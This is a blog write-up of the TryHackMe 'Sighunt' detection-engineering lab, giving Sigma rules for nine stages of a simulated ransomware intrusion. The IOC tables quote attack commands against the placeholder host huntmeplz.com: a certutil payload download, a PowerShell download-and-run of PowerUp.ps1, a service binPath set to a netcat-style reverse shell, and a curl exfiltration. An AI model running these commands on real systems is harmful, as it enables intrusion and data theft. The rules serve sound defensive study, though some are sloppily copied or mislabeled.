Sighunt

17 Jan 2023

Sigma Tryhackme

Sighunt

You are tasked to create detection rules based on a new threat intel.

Scenario

You are hired as a Detection Engineer for your organization. During your first week, a ransomware incident has just concluded, and the Incident Responders of your organization have successfully mitigated the threat. With their collective effort, the Incident Response (IR) Team provided the IOCs based on their investigation. Your task is to create Sigma rules to improve the detection capabilities of your organization and prevent future incidents similar to this.

Challenge 1

• Execution of malicious HTA payload from a phishing link.

title: Malicious mshta
id: 0f06a3a5-6a09-413f-8743-e6cf35561291
status: experimental
description: Detecting Malicious mshta execution
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1        
  ParentImage: '*chrome.exe'
 condition: selection
level: high

Challenge 2

• Execution of Certutil tool to download Netcat binary.

Attack Technique	Indicators of Compromise
Certutil Download	Image: certutil.exe
Command Line: certutil -urlcache -split -f http://huntmeplz.com/ransom.exe ransom.exe

title: Certutil Download
id: 0f06a3a5-6a09-413f-8743-e6cf35561292
status: experimental
description: Detecting certutil file ingress
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1      
  CommandLine|contains|all: 
  - "certutil"
  - "-urlcache"
  - "-split"
  - "-f"
  Image|endswith: "certutil.exe"
 condition: selection
level: high

Challenge 3

• Netcat execution to establish a reverse shell.

title: Netcat Execution
id: 0f06a3a5-6a09-413f-8743-e6cf35561293
status: experimental
description: Detecting netcat reverse shell
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection1:
  Image|endswith: '*nc.exe'
  EventID: 1
  CommandLine|contains|all: 
  - ' -e '
  - 'cmd.exe'
 selection2:
  Hashes|contains: '523613A7B9DFA398CBD5EBD2DD0F4F38'

 condition: selection1 or selection2
level: high

Challenge 4

• Enumeration of privilege escalation vectors through PowerUp.ps1.

Attack Technique	Indicators of Compromise
PowerUp Enumeration	Image: powershell.exe
Command Line: powershell “iex(new-object net.webclient).downloadstring(‘http://huntmeplz.com/PowerUp.ps1’); Invoke-AllChecks;”

title: PowerUp Enumeration
id: 0f06a3a5-6a09-413f-8743-e6cf35561294
status: experimental
description: Detecting powerup enumeration
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1
  Image|endswith: '*powershell.exe'
  CommandLine|contains|all: 
  - 'PowerUp.ps1'
  - 'powershell '
  - 'Invoke-AllChecks'

 condition: selection
level: high

Challenge 5

• Abused service modification privileges to achieve System privileges.

Attack Technique	Indicators of Compromise
Service Binary Modification	Image: sc.exe
Command Line: sc.exe config SNMPTRAP binPath= “C:\Users\victim\AppData\Local\Temp\rev.exe huntmeplz.com 4443 -e cmd.exe”

title: Service Binary Modification
id: 0f06a3a5-6a09-413f-8743-e6cf35561295
status: experimental
description: Detecting service binary privesc
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1
  Image|endswith: '*sc.exe'
  CommandLine|contains|all: 
  - ' binPath= '
  - ' -e '
  - ' config '
 condition: selection
level: high

Challenge 6

• Abused service modification privileges to achieve System privileges.

Attack Technique	Indicators of Compromise
RunOnce Persistence	Image: reg.exe
Command Line: reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce” /v MicrosoftUpdate /t REG_SZ /d “C:\Windows\System32\cmdd.exe”

title: Service Binary Modification
id: 0f06a3a5-6a09-413f-8743-e6cf35561296
status: experimental
description: Detecting service binary privesc
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1
  Image|endswith: '*reg.exe'
  CommandLine|contains|all: 
  - ' add '
  - 'RunOnce'
 condition: selection
level: high

Challenge 7

• Collected sensitive data by archiving via 7-zip.

Attack Technique	Indicators of Compromise
7-zip Collection	Image: 7z.exe
Command Line: 7z a exfil.zip * -p

title: 7z archive
id: 0f06a3a5-6a09-413f-8743-e6cf35561297
status: experimental
description: Detecting 7z suspicious archive
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1
  Image|endswith: '*7z.exe'
  CommandLine|contains|all: 
  - ' a '
  - '-p'
 condition: selection
level: high

Challenge 8

• Exfiltrated sensitive data through cURL binary.

Attack Technique	Indicators of Compromise
cURL Exfiltration	Image: curl.exe
Command Line: curl -d @exfil.zip http://huntmeplz.com:8080/

title: Curl Data Exfiltration
id: 0f06a3a5-6a09-413f-8743-e6cf35561298
status: experimental
description: Detecting Curl Data Exfiltration
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 1
  Image|endswith: '*curl.exe'
  CommandLine|contains|all: 
  - ' -d '
 condition: selection
level: high

Challenge 9

• Executed ransomware with huntme as the file extension.

Attack Technique	Indicators of Compromise
Ransomware File Encryption	Image: ransom.exe
Target Filename: *.huntme

title: Ransomware File Encryption
id: 0f06a3a5-6a09-413f-8743-e6cf35561299
status: experimental
description: Detecting Ransomware File Encryption
author: void
date: 17/01/2023
logsource:
 category: process_creation
 product: windows
detection:
 selection:
  EventID: 11
  TargetFilename: '*huntme'
 condition: selection
level: high

Overall these were some fun little challenges.